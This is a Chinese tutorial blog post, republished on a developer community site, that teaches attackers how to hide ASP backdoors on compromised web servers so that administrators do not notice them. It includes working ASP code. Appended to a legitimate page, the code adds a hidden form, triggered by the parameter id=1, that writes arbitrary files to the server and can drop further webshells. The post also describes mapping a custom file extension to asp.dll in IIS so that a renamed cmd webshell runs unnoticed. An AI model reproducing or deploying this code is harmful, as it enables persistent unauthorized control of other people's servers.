AI 助理
备案控制台
开发者社区 开发与运维 文章 正文

ASP后门的放置方法

2017-11-15 1364
版权
版权声明:
本文内容由阿里云实名注册用户自发贡献,版权归原作者所有,阿里云开发者社区不拥有其著作权,亦不承担相应法律责任。具体规则请查看《 阿里云开发者社区用户服务协议》和 《阿里云开发者社区知识产权保护指引》。如果您发现本社区中有涉嫌抄袭的内容,填写 侵权投诉表单进行举报,一经查实,本社区将立刻删除涉嫌侵权内容。
简介:
作者:中国论坛网收集  来源[url]http://www.51one.net[/url]

传在肉鸡上的asp后门,即使你改了代码,躲过了杀毒软件,但是细心的管理员也会发现在他网站web目录下会多出一个asp文件。针对这个问题,我想了两个办法,并没什么技术性可言,只是一个思路而已。
一种是aspInjection(好像这个词真流行呀)。先看第一个图。

这是一个动网文章管理的登陆页面,和平常没什么两样,原有的功能都存在。
再看第二个图,

看一下,用了[url]http://xxx/admin.asp?id=1[/url]就多出一个东东来了,第二个图下面这个框,你可以用它来生成网页木马,可以生成asp/php/cgi等网页后门。怎么做到的呢?只要你将这段代码插入某个asp网页代码最下端即可。

<%
onerrorresumenext
id=request("id")
ifrequest("id")=1then
testfile=Request.form("name")
msg=Request.form("message")
setfs=server.CreateObject("scripting.filesystemobject")
setthisfile=fs.OpenTextFile(testfile,8,True,0)
thisfile.WriteLine(""&msg&"")
thisfile.close
setfs=nothing
%>
<formmethod="POST"ACTION="你要插入的asp文件名?id=1">
<inputtype="text"size="20"name="Name"

value="http://blog.77169.com/<%=server.mappath("xp.asp"")%>>
<textareaname="Message"class=input>
   </textarea>
<inputtype="submit"name="Send"value="生成"class=input>
  </form>
<%endif%>


值得注意的是这段代码要求服务器支持fso,并且不是在所有的asp文件里都生效的。像被插入的asp文件有包含代码,即有<!--#i ncludefile="conn.asp"-->这样的代码,这段代码就不生效了,但不会影响原文件使用。如果你会写asp,你可以将一些asp后门直接写在肉鸡原有的asp文件里。
版主allen写了一个asp文件,一运行会感染所有的asp文件,同目录下每个asp文件都会被插入类似的代码。不知他几时提供下载。:_)

第二,在iis管理器中用asp.dll来解析任意后缀名。像图3,
我把后缀为lcx的文件名用asp.dll来解析。这样,我们把常用的cmd.asp改名为cmd.lcx,然后运行,你看会发生什么?

一样是一个网页后门。当然,起个什么后缀显得更隐蔽,看你的聪明才知智了。























本文转自loveme2351CTO博客,原文链接:http://blog.51cto.com/loveme23/8608 ,如需转载请自行联系原作者
文章标签:
.NET
关键词:
ASP方法
技术小甜
目录
相关文章
亚丁号
|
8月前
|
开发框架 .NET
ASP.NET Core NET7 增加session的方法
ASP.NET Core NET7 增加session的方法
亚丁号
98 0
代码掌控者
|
5月前
|
开发框架 中间件 .NET
分享 ASP.NET Core Web Api 中间件获取 Request Body 两个方法
分享 ASP.NET Core Web Api 中间件获取 Request Body 两个方法
代码掌控者
207 0
代码掌控者
|
5月前
|
开发框架 .NET API
如何在 ASP.NET Core Web API 方法执行前后 “偷偷“ 作一些 “坏“ 事?初识 ActionFilterAttribute
如何在 ASP.NET Core Web API 方法执行前后 “偷偷“ 作一些 “坏“ 事?初识 ActionFilterAttribute
代码掌控者
64 0
代码掌控者
|
5月前
|
开发框架 前端开发 .NET
Asp.net Webapi 的 Post 方法不能把参数加到 URL 中?试试这样写
Asp.net Webapi 的 Post 方法不能把参数加到 URL 中?试试这样写
代码掌控者
61 0
sysdzw
|
开发框架 JavaScript .NET
asp获取毫秒时间戳的方法 asp获取13位时间戳的方案
asp获取毫秒时间戳的方法 asp获取13位时间戳的方案。
sysdzw
404 0
痴者工良
|
开发框架 前端开发 安全
ASP.NET Core Startup类Config gure()方法|ASP.NET Core 中间件详细说明
目录 Startup 类 Configure() 方法 中间件 使用中间件 Configure 方法 的参数 IApplicationBuilder Extension Methods(拓展方法)--微软提供的中间件
痴者工良
201 6
ASP.NET Core Startup类Config gure()方法|ASP.NET Core 中间件详细说明
优惠码发放
|
SQL 存储 XML
ASP.NET Core 实战:基于 Dapper 扩展你的数据访问方法
ASP.NET Core 实战:基于 Dapper 扩展你的数据访问方法 一、前言 在非静态页面的项目开发中,必定会涉及到对于数据库的访问,最开始呢,我们使用 Ado.Net,通过编写 SQL 帮助类帮我们实现对于数据库的快速访问,后来,ORM(Object Relational Mapping,对象关系映射)出现了,我们开始使用 EF、Dapper、NHibernate,亦或是国人的 SqlSugar 代替我们原来的 SqlHelper.cs。
优惠码发放
4284 0
杰克.陈
|
Web App开发 监控 .NET
ASP.NET Web API 记录请求响应数据到日志的一个方法
原文:ASP.NET Web API 记录请求响应数据到日志的一个方法 原文:http://blog.bossma.cn/dotnet/asp-net-web-api-log-request-response/ ASP.NET Web API 记录请求响应数据到日志的一个方法 REST风格的服务架构已经成为越来越多人的选择,之前我用过WCF来实现REST服务,WCF是一个很强大的框架,干这点小事有点太沉重的感觉。
杰克.陈
1567 0
微wx笑
|
SQL 安全 .NET
ASP.net防止SQL注入方法
1、sql注入比较难防,需要替换select,delete等一打字符  其实对于字符型替换再多都没有替换单引号为两个单引号来的好!对于数字型替换再多都没有用,一定要类型转换。
微wx笑
1530 0
陈惊蛰
|
前端开发 .NET 开发框架
asp.net core中遇到需要自定义数据包解密方法的时候
最近将公司的项目用.netcore重写, 服务的http外部接口部分收发消息是DES加解密的, 那么在asp.net core mvc的action处理之前需要加入解密这个步骤.  我第一想到的是用filter的方法来做, 找到了ActionFilter, 重写了OnActionExecuting方法, 确实成功在action执行前拦截了下来, 但是request却是只读的.
陈惊蛰
1163 0